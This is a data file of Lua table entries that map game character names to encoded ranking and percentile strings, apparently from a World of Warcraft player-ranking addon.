["Wangbang"] = "RT:426/58%EB:603/79%EM:743/80%",
["Bangarang"] = "ET:717/93%LB:781/98%LM:934/95%",
["Wardette"] = "ET:709/91%LB:795/98%SM:1021/99%",
["Elwen"] = "ET:710/92%EB:750/94%EM:800/84%",
["Turbobird"] = "ET:703/91%SB:779/99%LM:940/96%",
["Velascette"] = "ET:623/83%EB:723/92%EM:889/92%",
["Zoit"] = "ST:821/99%SB:758/99%SM:956/99%",
["Buffetlord"] = "ET:256/79%EB:722/91%LM:959/98%",
["Kuntfila"] = "RT:459/62%EB:446/83%EM:703/75%",
["Waffels"] = "ET:713/92%LB:782/98%EM:824/86%",
["Xantu"] = "LT:763/96%LB:748/95%LM:923/95%",
["Pkkq"] = "ET:686/89%LB:755/95%EM:820/85%",
["Hugesausage"] = "ET:318/85%EB:645/83%EM:744/77%",
["Optimism"] = "LT:765/97%SB:799/99%LM:949/96%",
["Reddy"] = "ET:574/76%EB:613/84%LM:888/95%",
["Hazufel"] = "ET:662/87%LB:765/96%EM:888/92%",
["Teleport"] = "ET:387/92%LB:770/97%SM:1009/99%",
["Stonehead"] = "ET:707/91%EB:620/94%LM:947/96%",
["Babasin"] = "ET:607/81%EB:525/92%EM:805/89%",
["Phatj"] = "ET:697/90%LB:621/95%EM:803/85%",
["Ummasonpie"] = "LT:717/96%LB:727/95%",
["Quantz"] = "ET:236/75%LB:721/95%EM:777/88%",
["Bobobear"] = "ET:662/87%EB:706/90%EM:861/90%",
["Vënom"] = "ET:669/91%EB:573/94%EM:672/83%",
["Mikecho"] = "RT:458/63%EB:590/77%UM:119/36%",
["Verity"] = "RT:533/70%LB:636/95%LM:821/96%",
["Triggermann"] = "LT:770/97%LB:762/96%LM:938/95%",
["Ebison"] = "ET:259/80%LB:763/98%EM:876/91%",
["Darthtrevor"] = "LT:774/97%SB:775/99%LM:950/96%",
["Ironfox"] = "ST:707/99%EB:507/91%EM:754/81%",
["Perrch"] = "ET:715/92%EB:661/85%EM:775/83%",
["Nochanges"] = "ET:693/90%EB:674/86%EM:861/90%",
["Dogfobmal"] = "ET:555/76%EB:544/91%RM:544/62%",
["Talbe"] = "ET:676/94%EB:682/94%LM:698/95%",
["Fireblossom"] = "ET:640/84%LB:782/98%EM:808/89%",
["Svirfneblin"] = "ET:675/88%LB:685/97%EM:634/89%",
["Flywardance"] = "ET:728/93%EB:739/93%EM:863/89%",
["Glidor"] = "ET:736/94%LB:770/97%EM:782/82%",
["Maobi"] = "ET:691/89%LB:733/95%EM:724/77%",
["Hentaiheaven"] = "ET:622/82%EB:721/91%EM:830/86%",
["Vendomatik"] = "ET:395/93%EB:717/94%EM:620/93%",
["Deadshott"] = "ET:623/84%LB:762/96%LM:957/97%",
["Messandei"] = "ET:371/92%EB:573/80%RM:463/55%",
["Suessertod"] = "RT:458/65%RB:472/63%EM:803/85%",
["Fealen"] = "RT:541/74%EB:743/94%LM:789/97%",
["Undamaged"] = "RT:521/69%RB:483/68%EM:516/88%",
["Rubmywand"] = "RT:409/55%EB:567/75%RM:606/67%",
["Tuglight"] = "ET:666/90%EB:716/93%EM:829/91%",
["Almidas"] = "ET:359/91%EB:717/92%LM:974/98%",
["Whiteyoyo"] = "ET:704/91%LB:777/97%EM:681/94%",
["Powerdangle"] = "ET:656/90%EB:720/90%EM:836/93%",
["Yurin"] = "RT:501/66%EB:596/76%EM:742/78%",
["Hucklebuck"] = "ST:762/99%LB:700/98%LM:888/98%",
["Minorous"] = "ET:650/90%EB:603/90%EM:572/80%",
["Bilibalaboom"] = "ET:731/93%EB:589/78%RM:694/74%",
["Doridori"] = "RT:211/72%EB:675/85%EM:779/82%",
["Haters"] = "LT:774/98%SB:740/99%LM:812/98%",
["Tarkus"] = "ET:358/91%EB:705/92%EM:849/92%",
["Gadget"] = "ET:573/76%EB:741/93%LM:938/95%",
["Quaithe"] = "ET:441/94%LB:628/95%EM:889/93%",
["Meidei"] = "ET:238/77%RB:531/71%EM:515/84%",
["Dillinja"] = "ET:345/89%EB:640/89%EM:828/91%",
["Superpao"] = "ET:638/84%EB:593/93%EM:823/85%",
["Dulath"] = "LT:747/97%SB:811/99%LM:924/96%",
["Beleth"] = "LT:492/95%LB:712/98%EM:847/87%",
["Sydin"] = "ET:659/86%EB:722/92%EM:881/92%",
["Polyharry"] = "LT:739/95%LB:737/95%LM:953/97%",
["Mikemurda"] = "ET:695/92%EB:725/94%EM:801/91%",
["Colddy"] = "ET:290/84%EB:631/82%UM:379/43%",
["Skagen"] = "LT:775/97%LB:777/97%LM:941/96%",
["Joeruu"] = "ET:348/90%LB:676/96%EM:724/93%",
["Stayawhile"] = "EB:499/87%EM:817/85%",
["Deadlyvictim"] = "LT:459/95%LB:650/96%EM:869/89%",
["Allein"] = "LT:461/96%EB:524/89%EM:778/82%",
["Tenderbools"] = "ET:703/91%LB:752/95%EM:862/91%",
["Krayvi"] = "ET:693/90%SB:804/99%LM:853/98%",
["Edgefest"] = "RT:428/57%EB:712/90%EM:553/84%",
["Sabelyna"] = "ET:648/86%LB:768/96%LM:976/98%",
["Azteclamp"] = "CT:136/22%EB:690/87%EM:858/89%",
["Famicom"] = "ET:739/94%LB:737/98%SM:996/99%",
["Driscana"] = "CT:121/15%EB:592/78%UM:415/47%",
["Hummer"] = "ET:368/92%EB:588/93%EM:897/92%",
["Rots"] = "RT:538/71%EB:487/86%RM:661/71%",
["Ragnes"] = "ET:610/81%EB:694/87%EM:479/81%",
["Ickystîcky"] = "LT:771/98%SB:762/99%SM:927/99%",
["Bayyaz"] = "ET:684/89%SB:753/99%LM:939/97%",
["Zuodada"] = "ET:600/79%EB:657/83%EM:748/78%",
["Shneakysnake"] = "ET:714/91%EB:748/94%EM:756/80%",
["Sausage"] = "LT:434/95%EB:651/84%EM:738/78%",
["Oculus"] = "CT:192/24%EB:528/89%EM:805/83%",
["Velium"] = "RB:449/59%UM:58/32%",
["Jbagz"] = "ET:359/91%EB:594/78%EM:707/75%",
["Arthelawn"] = "ET:722/92%EB:685/87%EM:460/79%",
["Chancer"] = "EB:751/94%LM:939/95%",
["Dpodge"] = "ET:289/85%RB:562/74%RM:453/52%",
["Lanaya"] = "ET:593/80%LB:664/96%EM:907/93%",
["Kinyonga"] = "UT:346/48%EB:582/76%EM:687/76%",
["Apparition"] = "ET:738/94%LB:775/97%LM:828/97%",
["Trollnando"] = "RT:339/57%EB:589/77%EM:884/91%",
["Msbadhealz"] = "LT:697/97%SB:789/99%LM:905/96%",
["Avaric"] = "ET:290/84%EB:517/88%EM:851/88%",
["Helmüt"] = "LT:759/97%LB:783/98%LM:812/98%",
["Beathooven"] = "LT:634/98%LB:678/96%LM:786/95%",
["Lilwing"] = "EB:740/93%EM:835/86%",
["Zizim"] = "EB:730/94%EM:913/93%",
["Felucca"] = "ET:393/92%EB:468/84%EM:811/84%",
["Matching"] = "CT:64/24%LB:757/95%EM:917/94%",
["Schmo"] = "CT:169/21%EB:580/76%EM:862/88%",
["Âthenas"] = "ET:630/83%EB:565/91%EM:871/90%",
["Winz"] = "LT:503/96%LB:633/95%LM:772/95%",
["Phaty"] = "RT:381/52%EB:730/92%EM:909/93%",
["Rashun"] = "ET:249/80%EB:648/82%EM:754/79%",
["Critzt"] = "ET:520/77%SB:975/99%SM:1071/99%",
["Xoddir"] = "RT:530/71%EB:712/90%EM:846/89%",
["Skyball"] = "RT:534/70%EB:498/87%RM:692/73%",
["Dblchz"] = "RB:525/70%RM:621/66%",
["Beerwarrior"] = "LT:754/96%LB:625/96%RM:287/63%",
["Satival"] = "EB:682/86%EM:846/87%",
["Xdeekin"] = "CT:36/6%UB:191/49%RM:475/69%",
["Strangemr"] = "RB:388/52%RM:600/66%",
["Dohmai"] = "UT:151/47%RB:468/67%RM:253/60%",
["Cangjingkong"] = "EB:573/80%EM:754/82%",
["Brîgîtte"] = "CB:158/18%UM:395/42%",
["Valavar"] = "RT:163/50%RB:385/52%UM:129/49%",
["Creamsauce"] = "CT:52/13%UB:317/42%RM:501/55%",
["Tanney"] = "CB:98/9%CM:72/7%",
["Muragame"] = "UT:101/32%UB:194/49%RM:431/51%",
["Dokame"] = "CB:137/14%UM:142/38%",
["Glat"] = "UT:82/25%RB:479/66%RM:343/70%",
["Djpantzparty"] = "UT:107/38%RB:205/51%EM:563/79%",
["Easybro"] = "EB:596/82%EM:803/86%",
["Addora"] = "UT:105/33%UB:235/30%RM:524/62%",
["Freesanto"] = "UB:222/27%UM:403/44%",
["Matillis"] = "RB:430/62%CM:59/22%",
["Crayonpop"] = "CB:96/9%UM:362/43%",
["Soulreapa"] = "CT:38/7%RB:204/51%RM:504/55%",
["Coolbreezer"] = "RT:586/73%EB:479/89%RM:576/67%",
["Ceden"] = "UB:345/48%RM:668/74%",
["Biznus"] = "CT:65/18%CB:107/10%UM:110/31%",
["Yessir"] = "CT:67/23%RB:431/62%EM:389/77%",
["Pyrocow"] = "CB:177/20%RM:185/54%",
["Dallaswolfz"] = "UT:103/32%CB:104/10%RM:579/67%",
["Bitesthedust"] = "CT:70/6%UB:174/47%CM:208/19%",
["Steer"] = "CT:56/18%UB:293/38%RM:201/56%",
["Haruno"] = "UT:34/35%UB:24/26%RM:435/51%",
["Shyaman"] = "UT:92/28%CB:77/7%RM:370/73%",
["Pestt"] = "ET:344/78%EB:457/76%EM:654/75%",
["Nezarin"] = "ET:395/90%RB:485/70%EM:405/79%",
["Elyrellea"] = "UT:137/47%RB:223/55%RM:526/62%",
["Brownjohnson"] = "RT:108/65%EB:683/92%EM:849/88%",
["Kindless"] = "CB:172/20%RM:458/53%",
["Sloweer"] = "RB:159/54%EM:677/86%",
["Starbusts"] = "RT:430/53%RB:456/65%EM:587/76%",
["Bress"] = "UB:251/32%RM:337/72%",
["Típpy"] = "CT:34/2%CB:134/14%UM:452/49%",
["Myndra"] = "CB:57/4%UM:128/35%",
["Blingy"] = "CB:140/15%",
["Goodbubbles"] = "RB:521/72%EM:756/83%",
["Wicaya"] = "RB:412/58%EM:766/86%",
["Chalisay"] = "CB:144/16%RM:419/50%",
["Porkchopo"] = "CT:28/2%EB:700/94%EM:864/92%",
["Moggen"] = "RB:268/63%EM:808/87%",
["Emmora"] = "UT:329/43%RB:389/52%RM:611/68%",
["Seidrik"] = "RT:239/71%RB:477/66%RM:588/63%",
["Cptnhealahoe"] = "EB:652/89%EM:775/85%",
["Imtal"] = "RB:367/51%RM:565/63%",
["Whatadru"] = "ET:192/75%RB:200/59%EM:555/83%",
["Anarine"] = "ET:268/91%EB:489/83%RM:430/61%",
["Chengxuniu"] = "UT:78/28%EB:367/78%RM:625/73%",
["Horikita"] = "CB:84/8%RM:559/62%",
["Gamjafry"] = "RB:414/74%EM:800/93%",
["Phinehas"] = "UT:386/48%RB:462/66%RM:555/65%",
["Makár"] = "EB:565/88%EM:781/90%",
["Priestofdoom"] = "UB:283/37%RM:529/58%",
["Rongmomo"] = "RB:212/53%RM:231/57%",
["Randomeffect"] = "UB:276/37%CM:34/1%",
["Shreklover"] = "CB:107/10%UM:309/32%",
["Majfuzzball"] = "UB:266/34%RM:478/56%",
["Schiit"] = "UB:366/49%RM:633/70%",
["Scubasam"] = "UT:102/32%RB:466/74%EM:749/87%",
["Linark"] = "EB:630/86%EM:847/90%",
["Subful"] = "RT:62/51%RB:213/52%UM:279/48%",
["Chanur"] = "UB:349/47%RM:522/58%",
["Shockacon"] = "RB:286/57%RM:405/63%",
["Odi"] = "LT:752/95%LB:782/98%LM:977/98%",
["Aranel"] = "ET:733/94%SB:766/99%EM:902/93%",
["Bluntzilla"] = "ET:739/94%EB:692/89%EM:731/77%",
["Squareroot"] = "RT:232/74%EB:633/86%",
["Blyte"] = "RT:515/68%EB:571/80%RM:657/72%",
["Scrawl"] = "ST:730/99%LB:639/97%LM:717/95%",
["Phobik"] = "ET:275/82%EB:631/87%LM:932/95%",
["Vorpals"] = "ET:392/93%LB:711/98%LM:976/98%",
["Callania"] = "ET:361/91%EB:702/93%EM:882/92%",
["Jjonak"] = "ET:700/90%EB:608/94%EM:819/85%",
["Mcrob"] = "ST:801/99%EB:621/94%EM:802/85%",
["Nimblenuts"] = "ET:405/94%EB:604/93%LM:781/95%",
["Yoshimi"] = "ET:368/90%LB:759/95%LM:809/96%",
["Mantoun"] = "ET:708/91%LB:722/98%EM:675/92%",
["Darkbolts"] = "ST:693/99%LB:770/97%SM:975/99%",
["Yamaiko"] = "ET:582/78%EB:489/86%EM:495/82%",
["Keithbarry"] = "RT:490/65%RB:540/72%EM:820/87%",
["Dotsnthots"] = "LT:514/96%EB:720/91%LM:820/96%",
["Idotccs"] = "ET:665/87%EB:607/94%EM:836/86%",
["Cronics"] = "ET:683/88%EB:720/91%EM:877/91%",
["Thesupergman"] = "RT:440/58%RB:514/72%EM:782/84%",
["Chronograf"] = "ET:706/91%EB:748/94%LM:953/97%",
["Fainfreeze"] = "RT:445/59%UB:221/29%UM:353/37%",
["Sympozium"] = "ET:424/94%LB:763/96%EM:820/86%",
["Huntjay"] = "ET:714/92%EB:740/94%EM:909/94%",
["Autopilot"] = "LT:779/98%LB:789/98%EM:921/94%",
["Saulguldman"] = "ET:663/85%EB:676/87%RM:647/70%",
["Hakoda"] = "ET:246/78%RB:563/74%EM:443/78%",
["Nalowalê"] = "ET:674/88%LB:699/97%LM:881/96%",
["Jaywiggles"] = "ET:429/94%EB:705/90%EM:837/88%",
["Dylanc"] = "RT:512/69%EB:692/89%EM:782/84%",
["Folgers"] = "LT:765/97%LB:625/95%EM:722/77%",
["Muziq"] = "LT:790/98%EB:724/92%LM:921/95%",
["Zudy"] = "LT:754/95%LB:765/96%LM:922/95%",
["Phony"] = "ET:603/80%SB:807/99%SM:1071/99%",
["Ismm"] = "LT:609/98%EB:694/87%LM:761/95%",
["Vythus"] = "LT:625/98%EB:666/84%EM:691/91%",
["Linty"] = "ET:676/88%EB:716/91%LM:947/97%",
["Awisp"] = "ET:721/92%LB:780/97%EM:911/93%",
["Kweezzy"] = "ET:572/76%RB:547/73%RM:700/74%",
["Rdss"] = "ET:734/94%LB:769/97%LM:950/97%",
["Bewwy"] = "UT:255/33%UB:173/44%EM:801/85%",
["Idealz"] = "LT:752/95%LB:596/95%EM:764/87%",
["Moletin"] = "RT:510/68%RB:555/74%RM:696/74%",
["Tresus"] = "LT:786/98%LB:633/95%EM:867/89%",
["Badwitch"] = "ET:628/83%EB:591/82%EM:780/87%",
["Starion"] = "LT:633/98%EB:741/93%EM:856/88%",
["Gabrial"] = "ET:608/80%EB:729/92%EM:895/92%",
["Warbuns"] = "ET:335/88%EB:743/94%EM:878/92%",
["Afterblack"] = "ET:341/88%LB:765/96%SM:971/99%",
["Dashwhy"] = "ET:598/79%EB:670/86%EM:719/75%",
["Troggddorr"] = "LT:742/95%LB:792/98%EM:869/90%",
["Banedru"] = "LT:451/96%LB:662/98%SM:924/99%",
["Gimmebuff"] = "ET:666/93%EB:636/89%",
["Woon"] = "ET:633/83%EB:722/92%EM:732/78%",
["Ecoinn"] = "RT:213/69%EB:443/83%RM:651/67%",
["Bizmarck"] = "LT:750/96%LB:670/98%LM:772/98%",
["Diedfishfish"] = "ET:725/93%LB:662/96%EM:862/89%",
["Subluff"] = "CT:151/24%RB:440/57%EM:583/81%",
["Sythos"] = "ET:576/88%LB:743/96%LM:921/96%",
["Kirbiez"] = "ST:824/99%SB:835/99%SM:1006/99%",
["Orkhevaliet"] = "LT:759/97%LB:651/98%LM:863/96%",
["Lyzzie"] = "UT:343/46%EB:673/86%RM:574/59%",
["Heavyfalcon"] = "RT:363/52%EB:617/85%EM:800/90%",
["Randingo"] = "ET:248/79%EB:673/85%RM:700/74%",
["Alundail"] = "EB:723/91%EM:802/84%",
["Serbrr"] = "ET:701/91%SB:796/99%LM:886/95%",
["Ture"] = "ET:411/93%LB:698/97%EM:732/93%",
["Spectrum"] = "LT:617/98%LB:717/98%EM:796/83%",
["Gorogg"] = "ET:725/93%EB:452/83%RM:575/61%",
["Mösher"] = "ST:806/99%SB:805/99%LM:913/97%",
["Flavourburst"] = "ET:606/81%EB:597/78%CM:55/19%",
["Èden"] = "ST:720/99%LB:694/97%LM:844/96%",
["Alas"] = "LT:473/97%EB:497/88%EM:892/92%",
["Bthobfidget"] = "ET:618/80%EB:610/80%RM:614/66%",
["Jujubea"] = "ET:627/81%EB:720/90%EM:646/89%",
["Triggerd"] = "RT:390/53%LB:790/98%SM:998/99%",
["Noitativarg"] = "LB:765/96%EM:877/90%",
["Lagell"] = "ET:383/93%EB:565/91%EM:846/88%",
["Yellowmana"] = "ET:247/76%EB:597/78%RM:638/68%",
["Kritter"] = "ET:398/94%LB:576/95%EM:895/94%",
["Pepin"] = "LT:628/98%LB:779/98%LM:981/98%",
["Zaratul"] = "ET:717/92%EB:572/92%EM:767/94%",
["Ssoju"] = "RT:200/69%EB:682/87%RM:668/71%",
["Rouduoduo"] = "LT:763/97%LB:784/98%LM:947/97%",
["Gginindekyle"] = "ET:303/86%EB:638/81%EM:768/81%",
["Khmal"] = "RT:226/74%EB:718/93%EM:655/82%",
["Tankka"] = "EB:648/82%RM:238/57%",
["Rallan"] = "RT:179/60%SB:812/99%SM:1003/99%",
["Hired"] = "ET:694/90%EB:741/93%EM:897/93%",
["Kîllfate"] = "EB:637/83%EM:742/78%",
["Dhp"] = "LT:563/98%EB:716/91%EM:837/89%",
["Bß"] = "ET:290/83%LB:643/95%EM:624/88%",
["Dukbuki"] = "LT:449/95%EB:578/76%EM:745/79%",
["Carneia"] = "LB:758/95%LM:931/95%",
["Snowshadow"] = "CT:57/19%EB:593/93%EM:563/84%",
["Nashy"] = "ET:591/84%EB:659/88%EM:842/92%",
["Donalfier"] = "ET:303/86%LB:749/96%EM:675/94%",
["Needrage"] = "EB:593/85%EM:485/75%",
["Karambits"] = "CT:61/21%EB:566/75%RM:644/69%",
["Fuqumin"] = "ET:704/91%SB:772/99%EM:925/94%",
["Zozzo"] = "LT:455/95%LB:646/96%LM:941/95%",
["Joeybosa"] = "CT:146/23%RB:531/70%",
["Rrevoker"] = "RT:473/62%EB:466/84%UM:448/47%",
["Xirus"] = "UT:126/28%EB:590/75%EM:635/80%",
["Pneumatic"] = "RT:139/57%EB:702/88%EM:814/85%",
["Davidmiller"] = "RT:150/55%EB:661/83%EM:758/80%",
["Snuggle"] = "CT:57/6%EB:728/91%EM:741/78%",
["Ipawnu"] = "RT:228/74%LB:781/98%LM:974/98%",
["Zebgoro"] = "LT:744/95%LB:774/97%LM:958/97%",
["Churraso"] = "RB:523/70%EM:702/75%",
["Cattare"] = "CT:147/20%RB:390/55%EM:600/81%",
["Lother"] = "CB:105/23%RM:281/64%",
["Satbobbie"] = "RB:458/65%UM:235/27%",
["Kamishiro"] = "RB:432/62%RM:659/73%",
["Rustyy"] = "UT:87/29%UB:192/44%CM:39/2%",
["Satanic"] = "RB:346/66%UM:193/46%",
["Foozza"] = "UB:235/30%RM:624/72%",
["Digiret"] = "UB:323/43%RM:369/73%",
["Odeboc"] = "UB:153/39%UM:319/36%",
["Ggininderla"] = "CT:68/19%UB:279/37%RM:494/58%",
["Urthie"] = "ET:414/91%EB:556/79%",
["Madjai"] = "UB:276/36%RM:518/57%",
["Haruuna"] = "EM:705/81%",
["Priestophile"] = "CB:72/6%UM:369/44%",
["Shadowzheal"] = "CT:94/13%CB:129/13%",
["Flarëon"] = "RB:453/65%EM:668/77%",
["Drolsieh"] = "EB:616/84%LM:910/95%",
["Undeadshadow"] = "UT:55/49%RB:428/58%EM:801/87%",
["Telz"] = "UB:139/34%RM:185/52%",
["Malefisent"] = "CT:99/10%CB:34/1%EM:398/75%",
["Peste"] = "CT:66/18%UB:206/25%UM:51/38%",
["Propagandhì"] = "CB:9/10%",
["Roidbro"] = "UB:131/34%UM:161/46%",
["Poafette"] = "CB:158/18%RM:537/59%",
["Drmanbearpig"] = "CT:34/8%RB:412/72%RM:304/71%",
["Shamnado"] = "RT:196/59%UB:154/40%RM:294/65%",
["Kegorator"] = "UB:325/45%UM:361/38%",
["Nativehemp"] = "EB:610/84%EM:808/87%",
["Mooriahcowey"] = "RB:518/72%EM:813/87%",
["Aidin"] = "CT:34/2%EB:595/85%LM:890/95%",
["Evosa"] = "CB:64/4%UM:225/25%",
["Niightshadow"] = "RT:244/72%EB:542/77%RM:562/66%",
["Sacrilege"] = "CB:32/1%UM:201/29%",
["Beefyburrito"] = "ET:236/84%EB:647/91%EM:729/86%",
["Bodazafa"] = "UB:150/39%RM:194/51%",
["Ooberbandaid"] = "CB:59/11%",
["Manboy"] = "CB:66/5%UM:184/47%",
["Ceymor"] = "ET:416/79%EB:525/79%EM:736/86%",
["Iknoheals"] = "RB:256/56%RM:381/63%",
["Naychur"] = "CT:61/9%UB:308/40%UM:376/40%",
["Telary"] = "CB:165/19%UM:106/43%",
["Dagpoon"] = "ET:430/78%EB:535/91%EM:650/81%",
["Glug"] = "UB:112/49%RM:490/72%",
["Totalitarian"] = "CB:74/15%CM:14/15%",
["Brothersam"] = "CB:90/23%CM:76/8%",
["Blamethetank"] = "CT:31/1%UB:204/25%CM:240/23%",
["Uwumoo"] = "UB:116/30%UM:304/31%",
["Cable"] = "CB:25/0%",
["Highlordmath"] = "UB:307/41%UM:304/35%",
["Durd"] = "RB:211/51%RM:303/58%",
["Kuatou"] = "RB:409/72%RM:461/72%",
["Cinders"] = "UB:100/26%RM:530/59%",
["Notakecandle"] = "CB:90/19%CM:66/6%",
["Meelina"] = "RT:210/65%EB:559/79%UM:424/49%",
["Yvelas"] = "RB:441/63%EM:514/76%",
["Holypuppies"] = "CB:170/19%CM:130/14%",
["Taintedwheat"] = "RB:399/54%RM:558/62%",
["Ghostpope"] = "CT:32/1%SB:783/99%LM:966/98%",
["Harleyqueenx"] = "CB:114/11%UM:425/49%",
["Samuex"] = "CB:140/14%CM:155/17%",
["Griefbakon"] = "CB:45/3%UM:178/48%",
["Supplements"] = "EB:442/77%EM:571/79%",
["Smalltree"] = "CT:42/12%RB:368/52%RM:445/71%",
["Paladinty"] = "RB:433/59%UM:389/41%",
["Lobstee"] = "ET:478/85%EB:670/92%LM:923/97%",
["Midorigoi"] = "RT:226/71%UB:345/49%EM:832/89%",
["Lotharius"] = "UT:140/45%RB:463/64%RM:551/61%",
["Wizonesakura"] = "UB:297/40%EM:550/88%",
["Whomi"] = "UB:132/34%CM:243/24%",
["Kuzon"] = "EB:569/78%EM:768/83%",
["Niuby"] = "ET:720/92%EB:737/93%EM:856/89%",
["Egeria"] = "ET:724/93%LB:776/97%EM:925/94%",
["Leechee"] = "RT:469/62%EB:433/84%EM:812/86%",
["Borte"] = "ET:543/80%EB:595/85%LM:929/96%",
["Todeath"] = "RT:423/57%EB:712/91%EM:878/91%",
["Zeddsdeadd"] = "ET:712/92%LB:755/95%LM:959/97%",
["Boondockz"] = "ET:710/92%EB:715/90%EM:884/90%",
["Yficy"] = "ET:564/75%UB:323/42%RM:511/56%",
["Ramuun"] = "LT:751/98%SB:800/99%LM:952/98%",
["Blindjt"] = "ET:276/82%EB:511/91%LM:834/98%",
["Enacra"] = "RT:487/65%EB:652/85%EM:846/89%",
["Eliolock"] = "ET:723/93%EB:719/91%EM:782/83%",
["Arneezy"] = "ET:695/90%LB:754/95%LM:943/95%",
["Wyrone"] = "ET:249/78%EB:494/91%EM:633/93%",
["Thallos"] = "ET:656/86%EB:716/91%EM:777/83%",
["Savilla"] = "ET:605/80%EB:724/92%EM:912/93%",
["Bibbidi"] = "ET:732/94%LB:765/96%EM:878/90%",
["Merlyna"] = "ET:313/91%EB:635/83%EM:784/84%",
["Fenderder"] = "RT:548/74%EB:646/83%RM:381/67%",
["Lockt"] = "LT:500/96%LB:686/97%EM:917/94%",
["Asia"] = "RT:542/73%EB:566/79%EM:822/87%",
["Bowzilla"] = "LT:753/96%LB:783/98%LM:942/96%",
["Paulwalrus"] = "RT:546/74%LB:638/95%LM:839/97%",
["Happee"] = "ET:733/94%LB:753/95%EM:697/93%",
["Minimix"] = "RT:404/54%EB:629/86%EM:466/85%",
["Tssbba"] = "ET:606/80%EB:607/84%EM:774/88%",
["Kîll"] = "ET:725/93%EB:648/84%RM:489/50%",
["Djinn"] = "LT:642/98%EB:711/91%LM:941/96%",
["Tagni"] = "LT:764/96%EB:730/92%EM:811/84%",
["Amyntheletar"] = "ET:740/94%LB:765/96%LM:933/95%",
["July"] = "ET:702/91%EB:680/88%EM:714/75%",
["Stibby"] = "ET:244/77%EB:619/81%EM:693/76%",
["Pollymorphh"] = "ET:716/92%EB:638/87%LM:806/97%",
["Brake"] = "ET:696/90%EB:699/89%RM:620/67%",
["Reaka"] = "LT:660/98%EB:749/94%LM:942/95%",
["Spookyg"] = "ET:708/91%EB:709/90%EM:842/89%",
["Whina"] = "RT:489/66%EB:487/86%EM:260/76%",
["Jomm"] = "ET:606/81%EB:747/94%EM:909/93%",
["Kahlix"] = "ET:740/94%LB:631/95%LM:949/96%",
["Kindashort"] = "ET:278/82%EB:688/89%EM:824/87%",
["Rastilin"] = "ET:600/79%EB:564/91%EM:596/87%",
["Xayaah"] = "RT:153/56%RB:471/62%RM:523/61%",
["Vanillashark"] = "ET:730/93%EB:743/93%EM:788/82%",
["Metrage"] = "ET:229/75%EB:644/81%LM:966/96%",
["Subnet"] = "LT:749/95%SB:755/99%LM:940/96%",
["Matsihtwo"] = "ET:607/81%LB:764/96%EM:897/91%",
["Dummytank"] = "ST:788/99%LB:784/98%EM:812/90%",
["Pwniespogx"] = "ET:694/90%EB:741/94%EM:885/92%",
["Zilzag"] = "LT:768/97%LB:792/98%SM:990/99%",
["Realworld"] = "ET:603/79%EB:686/87%EM:752/78%",
["Joeyd"] = "ET:597/85%LB:687/98%LM:941/97%",
["Grimmar"] = "RT:133/50%RB:526/69%RM:628/70%",
["Cowtowntwo"] = "LT:731/96%LB:763/98%LM:918/97%",
["Kagrin"] = "LT:658/98%LB:771/97%EM:892/92%",
["Ashlandaine"] = "ET:274/82%EB:464/84%EM:731/79%",
["Lavi"] = "ET:384/85%EB:531/86%EM:682/87%",
["Threeiq"] = "ET:645/89%EB:524/79%EM:564/80%",
["Flowskii"] = "RT:403/53%LB:765/96%EM:860/89%",
["Kilmister"] = "ET:277/83%EB:481/86%RM:637/68%",
["Batik"] = "ET:500/76%EB:565/82%EM:576/76%",
["Lokochon"] = "LT:525/96%EB:659/85%EM:725/78%",
["Denahkina"] = "ET:654/85%EB:708/90%EM:832/88%",
["Aaos"] = "ET:640/89%EB:676/94%EM:866/94%",
["Mnnster"] = "LT:731/95%LB:738/95%LM:903/95%",
["Scottqt"] = "ST:798/99%SB:821/99%SM:919/99%",
["Constanting"] = "ET:434/78%EB:371/82%EM:504/84%",
["Joji"] = "ET:518/77%EB:417/89%LM:848/95%",
["Sugar"] = "ET:722/92%LB:762/96%LM:941/97%",
["Dalinar"] = "ET:654/90%EB:705/92%EM:793/89%",
["Succuba"] = "ET:693/92%EB:725/94%EM:881/93%",
["Facerolled"] = "EB:740/93%EM:917/93%",
["Tanner"] = "UT:244/35%EB:590/77%EM:712/78%",
["Wigfrid"] = "ET:382/93%EB:420/80%EM:741/80%",
["Enrogue"] = "RT:535/70%EB:668/84%EM:630/88%",
["Toxiff"] = "RT:466/61%EB:680/86%EM:865/89%",
["Risolju"] = "RT:530/72%EB:679/86%EM:869/91%",
["Mugrah"] = "LT:658/98%EB:737/93%EM:511/83%",
["Solvent"] = "RT:214/69%EB:519/88%EM:829/85%",
["Roudy"] = "RT:186/65%EB:580/76%EM:697/76%",
["Vspec"] = "EB:691/92%EM:862/93%",
["Moist"] = "RT:208/68%EB:589/75%EM:793/82%",
["Vicius"] = "EB:734/92%LM:952/96%",
["Ddfly"] = "RT:160/58%EB:743/94%LM:906/96%",
["Purplehazë"] = "ET:462/94%EB:725/92%",
["Glomerulus"] = "EB:621/79%RM:694/73%",
["Iplayretail"] = "EB:679/87%",
["Twiig"] = "EB:699/89%EM:885/91%",
["Zuggies"] = "EB:640/81%RM:603/64%",
["Tychaios"] = "LT:483/96%EB:552/90%EM:910/93%",
["Dianzai"] = "RB:495/66%UM:106/32%",
["Ganana"] = "RT:454/59%RB:543/72%CM:218/22%",
["Sneakydeeds"] = "UT:347/45%EB:604/79%RM:608/67%",
["Hatingxd"] = "LT:537/96%LB:764/96%EM:885/91%",
["Bosslox"] = "ST:786/99%SB:810/99%EM:905/93%",
["Hush"] = "UT:377/49%RB:507/68%EM:726/77%",
["Cujoshank"] = "ET:267/79%LB:764/96%EM:916/93%",
["Ionadene"] = "EB:628/86%UM:453/49%",
["Jikol"] = "RT:161/58%EB:695/93%LM:833/98%",
["Ironbull"] = "LT:731/95%LB:706/98%LM:838/98%",
["Personafes"] = "RT:237/74%EB:598/93%EM:523/81%",
["Emr"] = "CT:23/4%EB:644/83%EM:619/87%",
["Adage"] = "LT:654/98%LB:651/96%EM:871/89%",
["Muratic"] = "ET:388/91%EB:737/93%EM:923/94%",
["Rubz"] = "ET:331/89%EB:541/90%EM:782/82%",
["Hiperion"] = "RB:439/59%EM:843/87%",
["Vvk"] = "RB:228/52%EM:867/90%",
["Señorchop"] = "ET:688/89%EB:620/94%EM:826/88%",
["Johannesmp"] = "ET:635/94%LB:732/96%LM:850/95%",
["Merkator"] = "ET:695/90%LB:771/97%LM:787/95%",
["Rzzaa"] = "RT:182/62%EB:617/78%EM:543/83%",
["Zonendr"] = "LT:513/96%LB:675/97%EM:932/93%",
["Domoarigato"] = "ET:556/75%EB:611/79%RM:300/65%",
["Bloodcrave"] = "UT:361/47%EB:402/78%EM:715/75%",
["Extortion"] = "EB:664/84%RM:616/66%",
["Drgreenskin"] = "RB:519/69%RM:404/72%",
["Homeojr"] = "LT:771/97%LB:758/96%LM:981/98%",
